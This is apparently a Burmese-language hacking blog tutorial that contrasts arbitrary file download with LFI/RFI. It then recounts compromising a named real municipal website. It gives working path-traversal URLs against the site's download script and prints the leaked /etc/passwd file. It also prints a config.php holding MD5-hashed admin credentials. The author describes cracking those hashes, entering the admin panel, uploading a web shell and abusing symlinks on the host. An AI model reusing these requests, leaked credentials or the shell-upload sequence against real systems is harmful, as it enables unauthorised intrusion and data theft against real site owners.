Explaining Arbitrary File download/LFI/RFI & Exploiting Arbitrary File download vulnerability [TUT]

Arbitrary File download vulnerability နဲ ့ LFI/RFI က ရုတ္ရက္ျကည့္ရင္ ဆင္တူယိုးမွာနဲ ့မုိ ့ တခါတေလ ေရာေထြးတတ္ပါတယ္. ဒါေပမယ့္ exploit ဆက္လက္ျပ ုလုပ္သြားနိုင္ပံုခ်င္းေတာ့ မတူပါဖူး.
What is Arbitrary File download Vulnerability?
Web application server တစ္ခုဟာ user တစ္ေယာက္ request လုပ္တဲ့ file type ကို filter မလုပ္ထားမိရင္ဒီလိုမ်ိ ုး အေျခအေနမွာ any user က ဒီ server ရဲ ့ အေရးျကီးတဲ့ ဖိုင္ေတြ (eg../../etc/passwd or ../../etc/shadow etc .. ) ကို download ဆြဲယူျပီး sensitive information ေတြရယူသြားနိုင္ပါတယ္. ဒီ Arbitrary File download vul: ကို ေအာက္မွာ live hostတစ္ခုနဲ ့အဆင့္ဆင့္ေဖာက္ျပသြားပံုပါ ျပထားပါမယ္. ေအာက္မွာဆက္ျကည့္ျကေပါ့.



What is LFI & RFI?
ဒီေနရာမွာ LFI RFI အေျကာင္းကို အက်ယ္တဝင့္မရွင္းျပေတာ့ပါဖူး. Arbitrary File download နဲ ့ကြာပံုေလးပဲေျပာျပသြားမွာပါ. သူလည္းပဲ အေပါကလိုပဲ web app: server က path transverse<directory tranverse> နဲ ့sensitive file ေတြကို access ရမွာပါ.   LFI (local file inclusion) RFI(remote file inclusion) vulnerability. Web app: server က user input parameter ကို unfiltered မိတဲ့အခါမွာ LFI ဆိုရင္ local file ေတြကို path transverse ကေနျကည့္သလိုု  RFI ကေတာ့ remote malicious host တစ္ခုခုက file ေတြကို Urls ေတြနဲ ့ ဆြဲယူသံုးစြဲတာပါ. (both take advantage by unfiltered user input parameter). အိုေက ဒီေလာက္ဆို သေဘာေလးေတြ ကြဲကြဲျပားျပားသိေလာက္ပီထင္ပါတယ္. LFI RFI predominent ျဖစ္တာက php web application မွာအျဖစ္မ်ားပါတယ္.
အလြယ္ ေျပာရရင္ေတာ့ RFI/LFI က local web server application မွာ include() လုပ္ျပီး furthur exploitation (eg အေနနဲ ့ တစ္ခုေျပာပါမယ္, file inclusion ကေန writable log file ကို access လုပ္ျပီး code execute လုပ္ျပီး host ေပါမွာ shell upload တင္လို ့ရသလိုေပါ့ ) ဆက္လုပ္လို ့ရပါတယ္.
Arbitrary File download ကေတာ့ download ဆိုတဲ့အတိုင္း ျပီးမွ file view ျပီး ျကည့္ယံုတင္ေပါ့
Ok ဒါဆို ဆက္ဆြဲျကရေအာင္. ေအာက္မွာ arbitrary file download vul ဆိုက္ဒ္ေလးတစ္ခုနဲ ့ အဆင့္ဆင့္ ေဖာက္ျပသြားမွာပါ.
[ အမွန္မွန္ ရွာတာက whmcs xploit  ဟိီး .. ထြက္လာတာကို စမ္းမိတာက ဒလို ]
url ကိုျကည့္လိုက္ပါတယ္. ရနိုင္ေလာက္လားေပါ့ … ဒီလိုေလး
http://www.cityofindustry.org/scripts/dl.php?f=../uploads/files/specialevent.pdf

ျပီးေတာ့ စမ္းျကည့္ပါတယ္. /etc/passwd ဖိုင္ကို path transverse ကေန ရမရဆိုတာ..

Ok ေတြ ့တယ္မလား file size (7.5 KB) ေသခ်ာတယ္ ပါလာပီ sensitive information ေတြ
BooM!
http://www.cityofindustry.org/scripts/dl.php?f=/etc/passwd
eg few lines:

root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:102:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin cpanel:x:32001:32001::/var/cpanel/userhomes/cpanel:/usr/local/cpanel/bin/noshell cpanelhorde:x:32002:32002::/var/cpanel/userhomes/cpanelhorde:/usr/local/cpanel/bin/noshell cpanelphpmyadmin:x:32003:32003::/var/cpanel/userhomes/cpanelphpmyadmin:/usr/local/cpanel/bin/noshell cpanelphppgadmin:x:32004:32004::/var/cpanel/userhomes/cpanelphppgadmin:/usr/local/cpanel/bin/noshell cpanelroundcube:x:32005:32005::/var/cpanel/userhomes/cpanelroundcube:/usr/local/cpanel/bin/noshell

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34

root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:102:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin cpanel:x:32001:32001::/var/cpanel/userhomes/cpanel:/usr/local/cpanel/bin/noshell cpanelhorde:x:32002:32002::/var/cpanel/userhomes/cpanelhorde:/usr/local/cpanel/bin/noshell cpanelphpmyadmin:x:32003:32003::/var/cpanel/userhomes/cpanelphpmyadmin:/usr/local/cpanel/bin/noshell cpanelphppgadmin:x:32004:32004::/var/cpanel/userhomes/cpanelphppgadmin:/usr/local/cpanel/bin/noshell cpanelroundcube:x:32005:32005::/var/cpanel/userhomes/cpanelroundcube:/usr/local/cpanel/bin/noshell

အနညး္ငယ္ပဲေရးျပထားတာပါ အကုန္သိခ်င္ရင္ေဒါင္းသာျကည့္ေတာ့ .
ျပီးေတာ့ က်ေနာ္ ထပ္ျပီး ေလ့လာပါတယ္. server ပိုင္းကို ဆက္မျကည့္ေတာ့ပဲ .. ဒီဆိုက္ဒ္ရဲ ့ config connect ပိုင္းကို ဆက္ ျကည့္ပါတယ္.
http://www.cityofindustry.org/configs.php

Error File Not Found ဆိုေတာ့ အဲ့တာမဟုတ္ေသးဖူး.. ဆက္ျကည့္ပါတယ္
ျဖစ္နိုင္တဲ့  /include/ or /includes/ အစရွိသျဖင့္ config ထားတတ္တဲ့ path ေတြတစ္ခုခ်င္းစီလိုက္စစ္ပါတယ္. ေတြ ့ပါျပီး

http://www.cityofindustry.org/include/ မွာ config.php ဖိုင္. နွိပ္ျကည့္ပါတယ္.

ဟားဟား ကံကေကာင္းျပီးရင္းေကာင္းပါပဲ path  disclosure ကိုပါျပေနပါတယ္. ဒါဆိုေအးေဆး config ဆီကို arbitrary file download vulnerability နဲ ့ download ခ်ပလိုက္ယံုပဲ.. ဒါဆို config ကို ဒီလိုေလး download ခ်ပါတယ္.
http://www.cityofindustry.org/scripts/dl.php?f=/home/coi/public_html/include/config.php
Ok config ရပါျပီ ..

<?php date_default_timezone_set('GMT'); //Misc includes $cfg['inc']=array( 'login'=>'admin/login.tpl', 'index_admin'=>'admin/index.tpl', 'index_public'=>'public/index.tpl', 'index_secure'=>'secure/index.tpl', 'header'=>'header.tpl', 'footer'=>'footer.tpl', ); $cfg['logins']=array( array( 'username'=>'21232f297a57a5a743894a0e4a801fc3', 'password'=>'51e9475b6a6c8d3d0ee1783d5cf9b2fa', ), array( 'username'=>'78c8e611b4f9ec199787dad06d5e33ce', 'password'=>'630226fcd9c4ce5ba006e18778ce8a38', ), ); require_once('include/errors.php'); //require_once('include/ga.php'); require_once('include/email.php'); ?>

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29

<?php date_default_timezone_set('GMT');   //Misc includes $cfg['inc']=array(     'login'=>'admin/login.tpl',     'index_admin'=>'admin/index.tpl',     'index_public'=>'public/index.tpl',     'index_secure'=>'secure/index.tpl',     'header'=>'header.tpl',     'footer'=>'footer.tpl', );   $cfg['logins']=array(     array(         'username'=>'21232f297a57a5a743894a0e4a801fc3',         'password'=>'51e9475b6a6c8d3d0ee1783d5cf9b2fa',     ),     array(         'username'=>'78c8e611b4f9ec199787dad06d5e33ce',         'password'=>'630226fcd9c4ce5ba006e18778ce8a38',     ), );   require_once('include/errors.php'); //require_once('include/ga.php'); require_once('include/email.php');   ?>

အဲ့မွာ code ကိုေသခ်ာျကည့္ျကည့္ပါ သူ က php include ကိုသံုးထားသလားဆိုတာ OK ေတြ ့တယ္ေနာ္… ဒါဆို ခု config ထဲက login ေတြက admin panel ထဲ ဝင္ဖို ့ပါပဲ.
hash ေတြကို online md5 hash cracker ေတြနဲ ့တိုက္စစ္ျကည့္ပါတယ္.  ရပါတယ္ ခင္ဗ်ာ… .. ဟဲဟဲ.. admin panel ရွာယံုေပါ့ Ok ဆက္မယ္.
< admin panel ဘယ္မွာလဲ ဆိုတာ မေျပာျပေတာ့ဖူး… ကိုယ့္ဘာသာ logic နဲ ့ ဆိုက္ဒ္ တည္ေဆာက္ပံု page ယူသံုးတာကို ျကည့္လိုက္ရင္ လြယ္လြယ္ေလးပါ that’s your turn >
Ok ေတြ ့တယ္ ့ေနာ္ အထဲမွာ ေမာင္ဒုတ္ ေရာက္ေနပီ Lol …  ျပီးေတာ့ အားလံုးသိျကတဲ့အတိုင္း file upload ေနရာကေန shell upload တင္ျပီး site control ရယူလိုက္ပါတယ္.
proof:


ျပီးေတာ့ ဒီ host က easily symlink  လုပ္လို ့ ျဖစ္ပါတယ္.
proof:



[>] – Have Fun Sexy
[>] - Ref : http://dongoth.com/

Please Give Us Your 1 Minute In Sharing This Post!

SOCIALIZE IT →

Tweet

FOLLOW US →

SHARE IT →

Powered By: BloggerYard.Com